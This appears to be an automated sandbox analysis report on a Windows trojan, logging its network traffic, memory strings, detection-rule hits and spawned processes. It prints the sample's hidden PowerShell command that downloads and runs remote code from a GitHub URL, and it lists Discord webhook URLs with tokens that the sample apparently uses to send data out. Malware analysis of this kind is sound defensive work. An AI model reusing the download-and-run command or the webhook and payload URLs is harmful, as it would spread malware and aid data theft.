Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Content-Type: application/json | Host: discord.com | Content-Length: 297 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Content-Type: application/json | Host: discord.com | Content-Length: 297 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Code function: 0_2_006720D0 MultiByteToWideChar, MultiByteToWideChar, InternetOpenW, GetLastError, InternetOpenUrlW, InternetCloseHandle, InternetReadFile, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, CreateProcessW, WaitForSingleObject, CloseHandle, CloseHandle, CloseHandle, MessageBoxW, Sleep, VirtualAlloc, VirtualFree, Concurrency::cancel_current_task, 0_2_006720D0
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /labail300/psapi/main/modmenu.txt HTTP/1.1 | User-Agent: Downloader | Host: raw.githubusercontent.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Content-Type: application/json | Host: discord.com | Content-Length: 212 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Content-Length: 14 | Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox | Strict-Transport-Security: max-age=31536000 | X-Content-Type-Options: nosniff | X-Frame-Options: deny | X-XSS-Protection: 1; mode=block | Content-Type: text/plain; charset=utf-8 | X-GitHub-Request-Id: 928E:1FAF94:22FD91A:26C82AF:670E7404 | Accept-Ranges: bytes | Date: Tue, 15 Oct 2024 13:54:12 GMT | Via: 1.1 varnish | X-Served-By: cache-dfw-kdal2120091-DFW | X-Cache: MISS | X-Cache-Hits: 0 | X-Timer: S1729000453.642054,VS0,VE151 | Vary: Authorization,Accept-Encoding,Origin | Access-Control-Allow-Origin: * | Cross-Origin-Resource-Policy: cross-origin | X-Fastly-Request-ID: 6b3c7bc31e0ff925eb9dd89267d80fb5f0da6f0f | Expires: Tue, 15 Oct 2024 13:59:12 GMT | Source-Age: 0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 13:54:51 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000492 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F69Dnzw0wq7RtVEVpxbkNq5hZzTXGWno7esEgWayh6fA9Pyjs1jcnbLrvJVolv96jC%2FyNTHFmtbAl%2FDU9AmsmkW%2BrbKA%2F1Lzf%2B4Vf8kAAPAO%2BV%2Br5BSN3%2BBk7Bo%2F"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=69022a55f2b8783d0d63679e0838c8b202ffbc2e-1729000491; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=WlDXhfnKcSPqw_2Ei8YQ4SyVmTX.S.GQxnEfCc7UuGo-1729000491258-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d304dadbbc04692-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:55:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000520x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JUs1QElVF70VthSakJsafJd6%2Bo3mCuroQWk81tyvnvn9PPhLNUkwtJLtsikOZ11fRurFumyk%2FqU3Ux0zOzsxl6HAJNzraythxH%2Bb5y6COTvV2preqRk%2F3GmCQxc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=760c3f7f9a8f6b9971b915706863cede5079f7ea-1729000518; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=cSsEV_42yE8w9zOR.P2k92ne3S_DUmteHnQ3wLl0CcU-1729000518872-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304e5a3a3e4656-DFW
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E62C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E46FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E48FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.2227532640.000001D0F64B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coE
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discor
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000012.00000002.2072699759.00000204E4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1812665851.0000000004BE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/
Source: powershell.exe, 00000004.00000002.1812665851.0000000004639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: Lm9IJ4r9oO.exe | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt
Source: powershell.exe, 00000004.00000002.1812613044.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1820569925.000000000740C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812227809.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt-usebasi
Source: powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txtP
Source: powershell.exe, 00000012.00000002.2072699759.00000204E489E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt05
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt99u
Source: Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtg
Source: Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtn
Source: Lm9IJ4r9oO.exe | String found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtpowershell
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62862 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62864 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62866 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62868 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62870 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62871 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62872 version: TLS 1.2

System Summary

Source: amsi64_4116.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7688.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4116, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: String function: 00679060 appears 48 times
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
Source: Lm9IJ4r9oO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi64_4116.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7688.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@26/26@5/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7676
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jugoohmy.mwd.ps1Jump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: htt0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: ps://raw.githu0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: busercontent.c0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: om/labail300/ps0_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCommand line argument: >-i0_2_00692C90
Source: Lm9IJ4r9oO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Lm9IJ4r9oO.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\Lm9IJ4r9oO.exe "C:\Users\user\Desktop\Lm9IJ4r9oO.exe"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
